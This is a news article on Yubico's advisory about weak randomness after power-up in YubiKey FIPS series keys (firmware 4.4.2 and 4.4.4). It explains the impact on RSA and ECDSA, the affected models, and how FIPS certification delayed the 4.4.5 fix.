Security token maker Yubico has issued an important advisory affecting high-end versions of its YubiKey authentication key, arguably the most significant vulnerability discovered in this class of product to date.

Yubico describes the bug in its FIPS series as being:

Where the first set of random values used by YubiKey FIPS applications after each device power-up have reduced randomness … for the first operations performed after YubiKey FIPS power-up. The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted.

In other words, for the first operation after power-up at least, the cryptographic material produced by the key isn’t as random as it should be for secure encryption, creating a hypothetical short-term weakness that is only ironed out when that data has been consumed.

This affects cryptographic algorithms to different extents. For RSA it’s a modest 80 bits out of a minimum of 2,048 while for ECDSA it’s more like 80 bits out of 256 which could:

Allow an attacker who gains access to several signatures to reconstruct the private key.

These differences mean that the weakness is worse in some products than in others, for example the PIV Smart Card and OpenPGP implementations (which use RSA) compared to the FIPS FIDO U2F keys (whose authentication depends on ECDSA).

FIPS with everything

The weakness exists only in the YubiKey FIPS, YubiKey Nano FIPS, YubiKey C FIPS, and YubiKey C Nano FIPS, that is products that have the ‘FIPS’ prefix printed on them. Consumer and most business YubiKeys are not affected.

The Federal Information Processing Standards, or FIPS, is a suite of US standards for products used in environments such as the federal government or military that demand sophisticated encryption, hashing and signing algorithms.

Getting even a basic FIPS certification is time-consuming and expensive because NIST has to test compliance to all sorts of security characteristics, including things like physical tamper-proofing in addition to the robustness in the way encryption algorithms have been implemented.

Device makers jump through these hoops because they have to – no FIPS compliance at the required level and selling to the Feds becomes a non-starter.

It’s worth mentioning all this because the issue of FIPS has had a direct influence on the timing of Yubico’s advisory.

Affected YubiKeys are those running firmware versions 4.4.2 and 4.4.4 (there is no 4.4.3), which should be updated to FIPS Series firmware version 4.4.5.

It seems the weakness was discovered some time ago but the fix only shipped to customers on 30 April 2019 once it had passed FIPS certification.

That’s the extra complication of FIPS, which applies to everything, including urgent security updates.